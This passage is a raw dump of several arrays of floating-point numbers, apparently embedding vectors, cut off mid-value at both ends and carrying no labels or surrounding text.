84184,0.026142264,0.023740701,-0.10136934,0.0226657,-0.022523126,0.025432067,0.053193614,0.009517114,0.060067356,0.0063716476,-0.0015241483,-0.019335333,0.068690084,-0.014418282,0.028414302,-0.018488172,-0.055243216,-0.0120692635,-0.010752475,-0.01189835,0.04037318,-0.014346156,-0.03919338,-0.001482904,-0.005107172,0.036816232,-0.013381614,-0.033554904,0.0056463224,-0.010820924,-0.0120269675,0.006704872,-0.029802239,-0.04641766,-0.06407076,0.021670515,-0.06087748,-0.022179827,0.027933631,-0.0009294844,0.027663859,0.03148893,0.0180037,0.040158626,0.01810185,-0.033679266,0.005117951,-0.023312004,-0.032103237,-0.007562568,0.001448415,-0.004809742,-0.02363109,0.0014604888,0.0043395725,0.009719255,0.012370056,0.034312937,0.015067734,0.05529843,-0.045905557,0.0046051983,-0.018471787,-0.050339807,0.012374777,-0.025837796,0.011111637,0.029074386,0.010901398,0.009766183,-0.061078258,0.034649797,0.0033431158,0.08814934,0.008374427,0.004385638,-0.04822921,0.021570003,-0.057062626,0.055478718,-0.047968335,-0.05497962,0.029141633,-0.019490594,0.039432116,-0.025624694,0.03830856,0.060554504,0.018730365,0.034946233,-0.010550247,0.017653028,-0.050687563,-0.0045086066,-0.016538853,-0.0013683629,0.04936507,-0.0010399668,-0.015675377,-0.003690668,-0.017132072,0.030116279,-0.014206859,0.012995749,-0.06461352,-0.031870827,0.014381422,0.035938587,0.024115868,0.012115098,0.0069256467,0.03071721,0.0056909695,0.022679,-0.032658827,-0.03494616,0.017293366,-0.06361034,-0.011231168,0.024044659,0.035743136,-0.0026890442,-0.003085726,-0.018141497,-0.046661127,-0.004575789,0.012486035,0.04938781,0.04977833,0.008504124,-0.034125898,0.037707075,-0.013014885,0.03176252,0.01435754,0.016275758,-0.00087675126,0.033795517,0.01740156,-0.00016379631,0.013518446,-0.0161068,-0.000602818,-0.04202555,0.027279865,-0.047155075,0.003821936,-0.09175422,0.031419486,-0.015235542,-0.019714711,0.0047823987,-0.048022877,0.029291447,0.019366011,0.026639754,-0.02737686,0.014334546,-0.013720385,-0.008024332,0.016373493,-0.004788217,0.002343207,-0.015061342,0.013578893,0.018946948,-0.037463702,0.018675681,0.01138592,-0.01681036,0.075299434,-0.016311802,-0.07573495,0.024284786,-0.00040808076,0.0036548495,0.007301361,-0.020240292,-0.06155135,0.024822198,-0.03859191,0.014459854,0.048902903,-0.0163851,-0.04233675,0.030082712,0.030685201,0.06283024,0.028041938,-0.037590433,0.0020057561,0.01746956,0.009882911,0.019458134,-0.009207798,-0.01973551,0.030845815,0.04123626,0.061145525,0.017080754,-0.042334728,0.050396908,0.01871094,0.030715667,-0.013962708,0.008264971,-0.0058878423,-0.0012342947,-0.00039737223,0.027349008,0.046967227,0.024566201,-0.056293443,-0.07242368,-0.058350805,0.0049844403,0.040685043,0.046334185,-0.020113343,-0.048678745,0.023017451,-0.0071415426,0.029371971,0.049106233,-0.0058410983,0.10460299,-0.00885578,0.022760054,-0.055826794,-0.0054684523,0.0024660404,0.0074787927,0.0052969195,-0.051897302,-0.01792792,0.027724268,-0.029697066,0.0042516612,-0.0545899,0.019381389,0.038859256,-0.07208057,-0.010859728,-0.006509468,-0.054921128,-0.0345878,0.018179338,0.00275682,-0.018258305,0.014315354,0.023880735,0.03410466,-0.041571796,-0.009172513,-0.014971336,-0.043464042,0.03475772,0.019648245,0.01691887,-0.009941656,-0.025801567,0.061694752,0.00018078517,0.008856162,-0.008123239,-0.03517027,-0.017609568,-0.041918337,0.039752606,0.019953221,0.046061467,-0.008818055,0.052250117,-0.034124896,0.008475992,0.054767814,0.0071809706,0.06428612,-0.040609,-0.058654983,0.04751433,0.028421467,0.0036636319,0.0017071419,0.023147052,0.08772961,-0.08941683,0.06610184,0.0012226513,-0.012178023,0.037011664,-0.0012158781,-0.014736052,-0.021884676,-0.006015301,-0.06621341,-0.0053368635,0.05492411,-0.0678951,0.029002616,0.009789751,0.035940435,0.02441408,-0.049808625,-0.018044617,0.04158399,0.015956812,-0.065492325,0.007696628,-0.018333914,0.044691227,0.022585444,0.039929293,0.0065647312,-0.039991964,0.03243976,0.01586908,0.023847748,0.048329737,0.021118125,-0.067234054,0.046351165,-0.057557527,0.01137464,-0.056954995,0.08048042,-0.04019437,-0.009284962,-0.023234008,-0.07488601,-0.088170305,-0.05375179,0.016152034,0.06532132,0.037030123,0.0027577416,-0.027908472,0.0024965634,0.002844685,0.031696,0.06475386,0.0065674726,-0.05744194,-0.022020396,-0.042430412,0.014612396,-0.024414197,0.030340318,0.010479342,-0.06944825,-0.022364985,0.04652605,-0.017193286,0.01990075,0.022054711,-0.015483942,0.008149468,-0.06702177,0.019549418,-0.04270919,-0.031636324,0.008868198,0.008222086,0.01830288,-0.04567307,-0.0050450675,0.0112274485,-0.01312008,0.0010562745,-0.042735033,-0.08191534,-0.018860176,0.04498313,0.030660253,-0.034154322,0.031699598,0.06595112,0.0042258846,0.061618194,0.0034287954,0.0035846385,0.025017144,0.006790484,0.0013579243,0.011179309,0.008422155,-0.02657781,0.06268592,-0.005289528,-0.0140592335,-0.020165784,-0.020224238,-0.04361372,0.07337029,-0.047547746,0.038615238,-0.022265894,-0.03807176,-0.01684459,0.008959744,0.031177316,-0.021002518,0.0034408804,-0.048610676,0.0012084744,-0.0991495,0.029885175,-0.0067534656,0.019512903,-0.0004497226,0.061400086,0.059962414,-0.029853562,0.016166124,0.038917728,0.08600656,0.00041450214,-0.004457129,0.085266136,0.05786291,-0.021880366,0.05649769,0.051941354,0.036516115,0.032424357,0.0094405515,0.035885487,0.03346055,-0.026273945,-0.032153707,0.024932688,0.013097956,-0.028747112,-0.03845788,0.0069042766,-0.009267711,0.01168729,0.008760744,0.0057989405,-0.015167638,-0.069185175,0.040330492,0.016779318,0.014110418,-0.056284044,0.053005926,0.019736765,0.039419867,0.042270977,-0.012109633,-0.019252757,0.036810957,0.042152047,-0.0040153805,-0.020196421,0.009978269,-0.036862135,-0.0036642905,-0.03212224,-0.028160105,-0.0025124867,-0.0058013536,-0.008961605,-0.015301697,-0.0020401871,-0.011049621,-0.032845974,0.0035010937,-0.025004698,-0.020157246,0.10274445,0.014117655,0.020065079,-0.014651619,0.03729917,0.006271044,-0.013192087,0.043938152,0.007137945,0.0071167178,-0.053287487,-0.01331212,0.04089178,-0.014639858,0.042403515,-0.003573977,0.028457917,0.017193886,-0.03214926,0.002691692,-0.0020647873,0.022294192,0.0049541583,-0.0098968325,-0.010553463,-0.049108602,0.034734454,-0.0016289044,-0.052895643,0.01612238,-0.022814529,-0.048607677,-0.033976644,-0.01565435,0.058207244,0.016767064,0.04604046,0.0032052977,-0.0077379085,-0.061629675,-0.029193731,-0.022031246,0.07116386,-0.010304477,-0.014424452,0.026752338,-0.018676437,0.019025566,0.06416879,0.021969935,-0.04619656,0.007324728,-0.014716652,0.030776495,0.016267626,-0.0454942,-0.01535099,-0.000016063164,0.036273014,0.11363798,0.016853383,0.013073107,-0.023977142,0.068806306,-0.009848877,-0.043309975,0.00013162852,-0.035179254,-0.024507176],[-0.005743181,0.08166923,-0.1723639,-0.08433356,0.08003787,0.0003723611,0.010116028,-0.001084333,-0.033751585,-0.017662395,-0.02778946,0.0054067895,0.03821948,0.017057257,0.037408687,-0.07719165,-0.023512976,-0.048380226,0.001791412,0.0695571,-0.019177943,0.0043713525,-0.030111272,-0.07622097,0.04517712,0.045806855,-0.016455656,-0.005721291,-0.041570958,-0.034474496,0.0011255104,-0.03194669,-0.04270061,0.054044053,-0.067496546,-0.05550071,0.029375903,0.057623245,-0.025264198,0.03265207,0.04696697,0.024890007,-0.029186482,-0.016109174,0.022247005,0.0009751344,-0.029053485,0.002350696,0.040346477,-0.0798831,0.0029414864,-0.043716453,0.040532805,0.012065197,0.09209521,0.025149716,-0.01269022,0.009674059,-0.0006378461,-0.035470713,0.04144229,0.07579959,-0.1022229,0.08054056,0.020187827,-0.001096503,-0.0467628,0.046184603,-0.034217756,-0.069546096,0.07344709,-0.029340329,-0.027196571,0.04842158,-0.06193823,-0.02139219,-0.022372019,-0.019533781,0.021696283,0.0432651,-0.0118790995,-0.036753062,0.08653631,-0.02157456,0.056965813,-0.019915164,-0.019618101,0.012760692,-0.02467851,0.05162435,0.01888914,-0.003655281,0.007913444,0.0046447758,-0.05009547,-0.00374242,0.0014884002,0.02819294,-0.029250052,-0.022491915,-0.059859667,-0.01607707,0.05588461,-0.011838435,0.03487202,0.052834433,0.008064735,-0.011020462,-0.0073248283,-0.010318074,-0.025455764,0.07034577,-0.047013704,-0.021173237,0.0010488181,-0.019202115,0.034736004,-0.033959135,-0.02024241,0.029190054,0.019837292,-0.02658724,-0.016231112,0.055061087,0.008710072,0.00731602,-0.02036742,-0.016092464,-0.010891488,-0.021895373,-0.018921405,0.0123996455,-0.0232756,-0.013237995,0.00074441143,0.048976373,-0.0051228087,-0.03641303,-0.011641274,0.022080455,0.05477436,0.021737868,-0.038118616,-0.053227305,-0.004976611,-0.07319459,-0.007950265,-0.03640213,-0.020744897,0.009377464,0.029862415,0.017507993,-0.019564085,0.003802393,0.017001553,0.010679746,0.0086694425,0.007338726,0.012448426,0.039794944,0.022435281,0.038501073,-0.074338704,0.082669266,-0.0145633565,-0.047831535,-0.005890758,0.024479417,-0.0037311194,0.051428717,-0.069189385,-0.013868228,-0.0064665736,-0.00823988,0.0074623697,-0.00803882,0.0530791,-0.040445745,-0.014718542,-0.0071681747,-0.002194743,-0.071816705,0.040216785,0.0358397,-0.02731702,0.009488419,-0.005349571,-0.03191953,0.018292475,-0.008237981,-0.0073029697,0.020320289,-0.035261728,-0.0035807723,-0.022840401,-0.080825604,0.0024716242,0.0003721043,0.051627386,-0.06800922,-0.020650757,-0.006916253,-0.0433296,0.014857817,-0.03057848,0.04315071,-0.023986874,0.036001917,-0.029248863,0.040698867,0.074919045,-0.0024663303,0.040918592,-0.02405666,-0.017585998,0.014077923,-0.01469253,-0.020753937,-0.033144515,-0.018699316,0.029105471,0.0026341379,-0.03408942,0.010496268,0.01844677,-0.0086367605,-0.03683135,0.0141970655,-0.03172482,0.0043411227,-0.021413472,-0.11498408,0.045468733,-0.02654163,-0.028430004,0.019604994,-0.00027904243,0.0616235,0.024961555,0.018971194,0.007515925,0.022285452,-0.028330492,0.047811974,-0.053252846,-0.0022223266,-0.0045917775,-0.04467495,-0.032233912,0.07630539,0.009571133,-0.009394713,0.03673102,0.0063260756,0.056247905,-0.0044228467,-0.014105579,0.024262976,-0.0032228031,0.020614477,0.019251607,-0.04553469,-0.021526203,-0.05096754,-0.04934141,-0.040326007,-0.03094507,0.033044845,0.0055862647,0.0113727115,0.0063601644,0.045444053,0.0047894027,0.024900246,-0.02723194,0.02032326,-0.018152118,-0.0133733675,-0.018940879,0.009595958,-0.009884888,0.03952832,-0.0033643895,-0.011285735,0.033534683,0.01277205,0.045651104,-0.000035014946,-0.008610782,-0.014034088,-0.02358019,-0.03276599,-0.044805422,0.023839299,-0.012513979,0.014934691,0.0064041447,0.0040144194,0.0044473372,-0.0455129,0.04099653,0.010780979,0.048013553,0.054184493,-0.025559904,-0.027755452,0.024036009,-0.03029715,0.04991712,-0.04902814,-0.07208835,-0.0092918435,-0.033330083,-0.0016872083,-0.04044191,0.038826913,0.06610334,0.069271885,0.020046683,0.01605147,-0.01013829,-0.05200853,0.025074914,-0.0049655577,-0.012986134,0.08704084,-0.03407717,-0.020410737,0.020060005,0.0017072055,0.031879224,0.042393204,0.019952634,-0.038495693,-0.047918703,0.060753595,0.0068063647,0.005165304,-0.005345264,0.010500911,0.08390854,0.0072665187,0.019024527,-0.037203427,0.02284303,0.01791185,-0.06755981,0.008090287,0.02406224,0.03614178,-0.0033740012,0.006960968,-0.038766015,-0.023152027,0.01089273,0.023871321,0.024882102,0.047049213,0.02013543,-0.036857486,0.014830996,0.033153683,0.009576349,-0.020524288,0.011743213,0.063372366,0.027682789,0.0022686701,-0.013599481,0.061750755,-0.014346894,-0.04643932,-0.03765205,-0.029122498,-0.042073585,0.010847982,-0.078143515,-0.02459441,-0.028017655,0.030728668,-0.021819822,-0.030503968,0.02486252,0.033216216,0.05401032,0.0053150253,-0.0031837353,-0.015501293,-0.0075707505,0.04018351,-0.044118173,-0.026753126,-0.055776235,0.001159177,0.039459415,-0.032049038,0.01999994,0.027984953,-0.019228358,0.08185867,-0.001586948,-0.04966859,0.04535553,0.012888745,-0.024974411,0.04077023,0.019017324,-0.018836038,0.05605643,-0.0034662825,0.0064092316,0.039899636,-0.030793037,-0.03543066,0.0103304535,0.045384172,0.04358158,-0.032548472,-0.011418346,0.004517132,0.051111992,0.008597358,0.0014029122,0.0068434095,0.008131885,0.024392119,0.025053788,0.04822835,-0.042476356,-0.03790132,0.02137174,-0.006821168,0.01984545,-0.0077021853,0.021305278,0.0010964726,0.0051247217,0.07811052,0.023267062,0.046271276,0.017246816,-0.052314956,-0.059150577,-0.052728705,0.021527167,0.031224785,0.033925753,-0.0269935,-0.08964191,0.020082537,-0.008577693,0.045433965,-0.012446276,0.013174581,0.096753106,-0.020920511,0.009552191,-0.017404765,0.008847449,-0.010147665,-0.011816419,-0.0114177205,-0.047311366,0.003004113,0.022241944,-0.014226056,-0.0043603913,-0.028859219,0.01741925,0.032358076,-0.03870538,0.0075940127,0.0066409805,-0.038394254,-0.007574237,0.03491666,-0.02805997,0.016200338,-0.0034253,0.04727708,0.023713987,-0.03539176,-0.03392945,-0.019829018,-0.037622344,0.020548878,-0.0019447,0.0008579066,-0.005941376,0.001378276,0.008325028,0.0027821283,-0.009705604,-0.026215043,-0.06375323,-0.005337883,0.0042397287,0.030543584,0.023566544,0.035832856,0.026561951,0.04417347,-0.017648572,0.0067834733,0.014727999,-0.019541455,0.083024524,-0.028735593,-0.05031575,0.03658828,0.015408161,0.016770234,0.010469874,0.010755078,0.06815744,-0.053235516,0.045077853,0.024260119,-0.030560711,0.04943087,-0.00021457778,-0.065964736,-0.033548884,-0.029523902,-0.06575137,-0.011869533,0.03352267,-0.0892647,0.045279305,0.038825575,0.010816659,0.05337618,-0.021953747,-0.004959526,0.014471609,-0.015913708,0.011911922,0.014850963,0.03288798,0.054787956,-0.010099079,0.03964168,-0.020210478,0.004293562,0.06556195,0.010598449,-0.0012058732,0.056800067,-0.0062670843,-0.039099064,0.024463385,-0.05678972,0.013690686,-0.04137208,0.05443687,-0.014904124,-0.026356477,-0.025697121,-0.025661908,-0.07983645,-0.015841449,0.023730991,0.027075736,0.0067612487,-0.00023258812,-0.056229822,-0.016570676,-0.009945215,0.037209786,0.03241835,0.04674633,-0.03745905,0.0091193775,-0.021123525,-0.01985154,-0.010292805,0.034048848,0.0022315392,-0.06961458,-0.045684967,0.032579686,-0.017270394,0.025277795,0.03519261,-0.0073451367,-0.0037363786,-0.05841723,0.043010164,-0.051112007,-0.028113376,0.020324167,0.013752904,0.01986548,-0.023921086,-0.005891617,-0.000011589192,-0.0030925048,-0.02832171,-0.04576383,-0.08045454,0.014307931,0.03992784,0.027112547,-0.02223765,0.057760015,0.07640205,0.0045002955,0.041198354,-0.01096317,-0.03377927,0.033857696,0.049199138,-0.033567306,-0.018121952,0.0113360975,0.000576449,0.07035965,-0.02540667,-0.012863846,-0.028725974,-0.014238194,-0.019047732,0.07940884,-0.047308084,0.026830591,0.0049892645,-0.012166669,-0.021451822,-0.027790885,-0.00027121865,-0.062668785,-0.0051206555,-0.029283488,0.0010790892,-0.06294821,0.023664378,-0.03433339,-0.011388728,0.019480433,0.037304707,0.06605657,-0.05443029,0.0021860031,0.04084405,0.05899459,-0.034311373,-0.034336712,0.08123604,0.043083966,-0.02623334,0.059566982,0.050994862,0.030962097,0.004205259,0.00433797,-0.0144004915,0.030969938,-0.029688437,-0.052845296,0.000704994,0.028516218,-0.012655709,-0.018670589,0.007762264,-0.00961719,0.027411774,0.0036558702,0.013409394,-0.033474304,-0.028194414,0.033797074,0.027209118,0.015419775,-0.05875827,-0.018911814,0.017540928,0.056733273,0.024322823,-0.018886106,-0.030399969,-0.003898278,0.011143061,0.031226033,-0.06258622,-0.026692009,-0.06241736,0.034071177,-0.009875922,-0.022605732,-0.0042985505,-0.028445803,-0.047303542,-0.007829999,-0.018506456,0.014225202,0.025874423,-0.012257378,-0.008454795,-0.05292484,0.088801056,0.011869098,0.040591672,-0.028083537,0.03550771,-0.0027079857,-0.011541149,0.055633504,0.018479973,0.013668846,-0.042952217,-0.019987134,0.021883968,-0.044665013,0.029951436,0.024142364,0.05348889,0.0074519482,-0.04649505,0.014378353,0.021799862,0.05059932,-0.0005911393,-0.05838936,-0.038770925,-0.040988658,0.008358431,0.039199278,-0.044418883,0.03183507,0.019564671,-0.021467779,0.008563985,-0.026103072,0.07711163,-0.017839635,0.05081992,0.00075070176,0.021275586,-0.043646522,-0.012976683,-0.0022974198,0.027271213,-0.00746995,-0.008906311,0.0053155264,-0.04406492,-0.043912265,0.05025994,0.04334655,-0.03709313,-0.0041120998,-0.013404519,-0.0029865059,0.013535976,-0.01049337,-0.003558798,0.019478356,0.03355744,0.14170694,-0.0014323934,0.011120709,-0.037203547,0.05705129,-0.010802183,-0.05062029,-0.011529513,-0.04809312,-0.06550402],[-0.040630072,0.0789594,-0.1419701,-0.08147163,0.088620454,0.01708818,0.0041067046,0.04181956,-0.013179504,0.022200866,-0.0010056912,-0.008892945,0.080780305,0.015635459,0.033464476,-0.044239905,0.027314013,-0.118767135,-0.009675184,0.045151412,-0.047552697,-0.025235308,0.0034279635,-0.023032354,0.061414223,0.028866697,-0.037390247,0.0070327725,-0.03879675,-0.049186837,0.027317781,-0.0404402,-0.033653993,0.04411727,-0.078104384,-0.04189202,0.060052853,0.08150954,0.017729787,-0.024572317,0.049179755,0.0147135975,-0.029535832,-0.054369938,0.010731633,-0.004071976,0.028466122,-0.020574424,0.028004667,-0.054132458,0.017894013,-0.0019504,0.04302095,0.02000935,0.09011377,0.067003034,0.017996464,0.006853543,-0.021917166,-0.051984515,0.027017513,0.0873033,-0.09826277,0.06229651,-0.0016971306,-0.028786737,-0.033423908,0.020889558,-0.012322004,-0.065814696,0.02327871,-0.03275956,-0.04852592,0.034658708,-0.0023553707,0.007826768,-0.01148565,-0.004902862,-0.014101348,0.028290637,0.016243141,-0.018101895,0.09231656,-0.017563371,0.030880079,-0.024897574,-0.053597026,-0.026210295,-0.016007824,0.07893041,0.008697881,-0.003714295,-0.016461724,-0.01976999,-0.055294786,-0.019525515,-0.03158215,0.014512037,-0.028837688,-0.009201566,-0.04224894,-0.03099256,0.018798131,-0.038128912,0.020081665,0.06660283,0.008198403,-0.028853578,-0.0071447073,-0.038304623,-0.03172244,0.018172042,-0.06299593,0.008046189,-0.049992185,-0.04461512,0.026749203,0.021056961,0.030798478,0.07468248,0.007390229,-0.04439575,-0.020372394,0.030513337,0.0064858687,0.07522218,-0.04631586,-0.005542612,-0.036669955,-0.01348196,0.013573207,0.029203689,-0.039391536,-0.028446943,0.024106283,0.083481036,-0.0049864766,-0.036682524,0.045543138,0.0132447705,0.03838537,-0.015593192,-0.03836965,-0.033653133,-0.0713673,-0.051567778,0.03087774,-0.009306061,-0.029614018,0.012798595,-0.0155664645,0.029195521,-0.001980611,0.030966043,0.012335676,0.0019897548,0.04080052,0.016628187,0.0026816272,-0.007976467,0.03608925,0.028112348,-0.07447798,0.010480525,-0.014015576,-0.064432286,-0.012581925,-0.014922182,0.006262188,0.018043205,-0.047235508,-0.022060929,0.017412513,-0.000011073871,0.04934956,-0.049656276,0.056724552,-0.050349433,-0.05298115,-0.029619219,0.010178538,-0.046702415,0.04314742,-0.012581707,-0.012387698,-0.005745416,0.010844728,-0.015201279,0.041555837,-0.0021992053,0.022529129,0.023826024,-0.04602716,-0.028773334,-0.027821844,-0.043051895,0.04271741,-0.009479418,0.013289091,-0.00946009,-0.03271738,-0.005373119,-0.04699236,0.0073119374,-0.07103635,0.047226463,0.009152013,0.026499016,-0.035857394,0.040484875,0.07527675,-0.01789073,0.017726677,0.007680294,-0.002372929,0.01586871,0.01365647,-0.0064991554,-0.040697806,0.017447298,0.017942145,-0.00092617376,-0.0050548017,0.049907044,0.0010817384,0.00085014617,-0.058011107,-0.018938962,-0.0185429,0.038675766,0.02889227,-0.06868863,0.07247459,-0.0072952257,-0.00075774663,0.038080603,0.032429166,0.06669573,0.0054061725,0.023292562,0.014786103,0.06429335,-0.05089229,0.000681774,-0.059910048,-0.020588353,0.027489282,-0.012637084,-0.009717491,0.06779728,0.014674881,0.019639796,0.011526383,-0.0038185136,0.027063057,-0.024022125,-0.0045135734,0.05877843,0.020846283,0.006183842,0.019230722,-0.07488089,-0.024892878,-0.022956518,-0.05705444,-0.019460425,-0.037682526,-0.01643343,0.013423872,-0.01755995,0.034084525,0.04889951,0.019327639,0.03162619,-0.018527055,-0.008470009,-0.065726176,-0.015591864,-0.015640236,0.010453152,-0.0084946705,-0.045028474,0.006277585,0.011783471,0.0070099775,0.01600292,0.021885378,0.019308753,-0.00024210876,-0.031501126,-0.006306423,-0.021411665,-0.026334021,0.0031763613,-0.042517044,0.047612656,0.062501505,0.025994793,0.0020189653,-0.058416888,0.05811439,0.011456988,0.054410793,0.03347986,-0.015079193,-0.009833968,0.001854301,0.010397817,0.010614699,-0.032709803,-0.07649546,-0.024769489,-0.029712949,-0.058248725,-0.043105695,0.028488155,0.0123288855,0.03223982,-0.0091354605,0.013031311,0.005161475,-0.03403693,0.0069111045,-0.044387557,-0.0050775395,0.07106404,-0.042092092,0.006577752,-0.02208353,-0.021728184,0.037058458,0.040456157,0.012508049,-0.002107169,-0.015037906,0.013405899,0.01357775,0.02287702,0.030507136,0.019299535,0.057945598,0.00781398,0.049980935,0.001315953,0.0003432437,-0.006175575,-0.026017206,-0.023603927,0.06089198,0.012950519,0.01733035,0.026791906,0.0028011801,0.003002681,0.026427116,0.0149669945,0.032228686,0.062238682,0.010075029,-0.026908794,0.031973604,0.0073036146,0.0411026,-0.017532676,0.021514872,0.04194819,0.020547792,-0.009492527,-0.007127378,0.03739777,-0.017912507,-0.061481323,-0.036592916,0.019264283,-0.029350076,-0.011292906,-0.060922507,0.02409602,-0.041060865,0.0054503344,0.017248163,-0.022171346,-0.044626735,0.0133203715,0.038851127,0.026565861,0.0019276649,-0.042967666,0.024464868,0.034005385,-0.0034935584,-0.016984198,-0.0050045345,-0.006315212,0.013355086,-0.02695907,0.018653084,-0.002245125,-0.052152146,0.056805164,-0.020886768,-0.06361287,0.049379118,0.00573293,-0.038885314,0.0009649556,-0.009561567,-0.032135982,0.036478613,-0.031157428,0.037366558,0.050937213,-0.0047007855,-0.041297205,-0.0015037596,0.018476438,0.015462684,-0.013372363,-0.009176775,0.023631573,0.0048383595,0.0011318222,0.045209594,0.023121694,0.04959029,0.03539349,0.020955691,0.04114584,-0.046724934,-0.055294104,0.0438002,-0.034187507,0.018597448,0.018606039,0.012668746,0.027266048,0.012910164,0.05202843,0.024132704,0.06189624,0.05516751,-0.037274975,-0.029985597,-0.03701365,0.03576843,0.038716335,0.022189714,-0.022872793,-0.07641722,0.011825403,0.00030494767,0.027441105,-0.00221465,0.015376831,0.10159933,-0.04115236,-0.028448096,-0.021940485,0.006460269,-0.025015324,-0.010137915,-0.0069086277,-0.051820956,0.024700778,0.027477993,0.012897983,-0.041783743,-0.01711818,0.027342953,0.026702285,-0.09610625,0.01394786,0.027002284,0.014770477,-0.047501978,0.0010347434,-0.023586364,-0.0028195765,0.04257789,0.081200555,0.027145695,-0.014966397,-0.029917568,-0.065614626,0.013940668,0.059707124,0.0042613936,-0.020958211,-0.024109311,-0.026439682,0.03794536,0.010391763,0.01689128,-0.035223417,-0.047739692,-0.026413182,-0.019830659,0.0165545,0.052542463,0.0531889,-0.019325174,0.037410453,-0.020797009,0.001420867,0.0203325,0.00073918334,0.0362827,-0.049291156,-0.08644255,0.033378914,0.00748099,0.014918207,0.011092927,0.021430729,0.035091296,-0.03737806,-0.0019434222,0.009005886,-0.048700657,0.006575643,0.03636625,-0.062332284,-0.032950968,-0.044401497,-0.06648746,0.025382668,0.060546517,-0.09869346,0.059852492,0.0031046015,0.027305325,0.049589314,-0.048716933,0.0009746223,0.015565643,0.0008235862,-0.015722958,0.017841421,0.021077106,0.0134291,0.013883556,0.06398891,0.054897577,0.04258589,0.07726314,0.015863072,-0.056323983,0.05875754,0.040972084,-0.0813141,0.00613058,-0.071999475,0.004359208,0.0050754137,0.05632743,-0.01356459,-0.042599756,-0.033571403,-0.016441882,-0.06325159,-0.015589993,0.0346276,0.033984035,-0.006045404,-0.03738401,-0.031569865,-0.00726559,-0.009040183,0.017688738,0.047821105,0.048803784,-0.05521818,0.018873014,-0.00062981603,-0.018680582,-0.03846454,0.042649157,0.009870758,-0.061782625,-0.080471635,0.0283469,-0.056611557,0.06455461,0.047943387,-0.032594003,0.0026984636,-0.048442427,0.00017614373,-0.041591007,0.01758736,0.014215346,-0.01271251,0.030469256,-0.010025313,0.027443886,-0.0012473343,-0.0020410747,-0.042889412,-0.060069624,-0.047917992,-0.036749937,0.024725102,0.037490502,-0.05632359,0.045183145,0.06862838,-0.023281602,0.084219545,0.01654059,-0.009899447,0.012693222,0.012218463,-0.008356447,0.015058528,0.016498096,0.0021384642,0.044399805,-0.010173089,-0.029614901,-0.014838273,-0.02483644,-0.060678348,0.08755963,-0.045583557,-0.001306892,-0.0105638085,-0.02301097,-0.0044152993,0.0027575705,0.049810436,-0.079121,0.0034710295,-0.0023890513,0.02658798,-0.033795338,-0.011532637,-0.021698711,0.013725319,0.018740457,0.049229857,0.06107395,-0.024027232,-0.016113913,0.03197851,0.025698012,-0.015160281,0.0008835361,0.07475283,0.036340892,-0.008288721,0.07670834,0.056688875,0.021147253,-0.01107206,-0.016363565,0.0021832974,0.04190785,-0.030752633,0.028296439,-0.02825217,0.032272223,-0.018591994,-0.009089872,-0.034209915,0.009609315,0.0020318588,0.009883255,-0.0051934663,-0.03213209,-0.021824146,0.06374346,0.0023254142,-0.014822356,-0.036154933,-0.020797694,-0.023890091,0.011341349,0.036629,-0.0015145562,-0.030348444,-0.013402227,0.020506829,0.023114655,-0.04597966,-0.005106139,-0.065019414,0.05311185,-0.017858751,-0.05469516,0.007116408,-0.037077103,-0.036833733,0.01597581,-0.025473421,-0.00804563,0.023590108,-0.015523124,0.0013791892,0.009694699,0.04073408,-0.0122894645,0.011275755,-0.041965086,0.054409653,-0.030936658,-0.02486096,0.008871117,0.004868879,0.020350026,-0.029771172,0.002423719,0.040826686,-0.050351817,0.043617755,0.037249725,0.00851126,-0.025955634,0.0022382285,-0.00048426402,0.019948263,0.026434528,-0.0067887395,-0.047679365,-0.028067848,0.0073855873,0.02118449,0.037299596,-0.045362607,-0.022090616,-0.03038545,-0.014670406,-0.011860329,-0.041704703,0.050646476,-0.015603079,0.034713242,-0.016887454,-0.032497138,-0.05890017,-0.017932596,-0.031909868,-0.015183576,0.015911613,0.0031964146,0.02408259,-0.045648713,-0.001988378,0.041200805,0.02262112,-0.03599868,0.00007891593,0.012116418,-0.020087745,0.007575893,-0.013363953,-0.008020418,0.043839473,0.026174018,0.069908574,0.01171078,0.0069167977,-0.015992869,0.065996766,-0.015109662,-0.06850544,0.011125685,-0.019065179,-0.036407527],[-0.03700731,0.045622915,-0.18326187,-0.036133587,0.056016345,0.03703629,0.041774847,0.022471279,-0.029348668,-0.039373655,-0.026057018,0.08340342,0.09665223,-0.01030323,0.0030454632,-0.041286796,-0.009637617,-0.0643814,-0.0012402092,0.008831912,-0.0010853986,-0.011319798,0.00097197667,-0.029558936,0.051999066,0.059282325,-0.011241184,-0.02010232,-0.012191464,0.020307673,0.05253005,-0.04247025,-0.0566989,-0.0077543,-0.07177842,-0.020903222,0.052981503,0.034418833,0.023418603,0.0050556343,0.06767504,0.006630176,0.015674954,0.0126051605,-0.0070765633,0.03246793,0.026672948,-0.040120795,0.021621762,0.01571755,0.051953584,0.015083288,0.036798585,0.04570132,0.07792324,0.02715553,-0.057220247,0.010997409,0.005823066,-0.07701459,0.069435775,0.056670986,-0.09091841,0.024487836,0.033690013,-0.036104925,-0.025774902,0.055033386,0.027160842,-0.0341479,0.029796267,-0.018739015,-0.0039878096,0.02960391,-0.047658972,-0.022393191,-0.03004121,-0.038041584,-0.01671996,0.058095086,0.04273514,0.026778208,0.093190044,-0.026551956,0.05047061,-0.017904337,-0.06143758,0.0035274224,-0.045278724,0.09135542,-0.026572026,0.017880844,0.035970747,0.036034983,-0.008827447,0.044831157,0.022328535,0.058884185,-0.04848654,-0.004834076,-0.010622225,-0.013578492,0.024099076,-0.029967235,0.040084254,0.054017853,-0.0059989328,-0.01367152,-0.035164498,-0.00910506,-0.054400455,0.044133555,-0.02718102,-0.020748153,-0.054311763,-0.0161722,-0.0065345275,-0.041174326,-0.004452444,0.049083736,0.029952195,-0.0405344,-0.010859635,0.03837705,-0.037088625,-0.009901827,-0.044440586,0.008182867,-0.036675498,-0.030305864,-0.006986601,-0.040223993,-0.03971491,-0.02643706,0.041086044,0.10818516,-0.02901446,-0.035737306,0.0019057709,0.021037497,-0.0048055695,0.054639984,0.0141356,-0.0048026624,0.011263738,-0.038594432,0.0006824557,-0.025088347,-0.05921326,0.04582289,0.042642657,0.03613424,-0.009328003,0.015266138,-0.0033762793,-0.005076515,-0.025656054,0.021141188,0.021899246,0.02722497,0.04195854,-0.0020166216,-0.016525177,0.02385886,-0.0019455446,-0.03479677,-0.0032036095,0.021436544,0.006526,0.05157053,-0.075425744,-0.032992378,0.0050218524,-0.012687019,-0.033879805,0.01309021,0.07595565,-0.019642217,-0.00042444316,0.011823311,0.053605404,-0.017872982,0.052060343,0.03444024,-0.0077524865,-0.055245925,0.0307173,0.016803902,-0.0061996756,-0.022629064,0.026097294,-0.008205798,-0.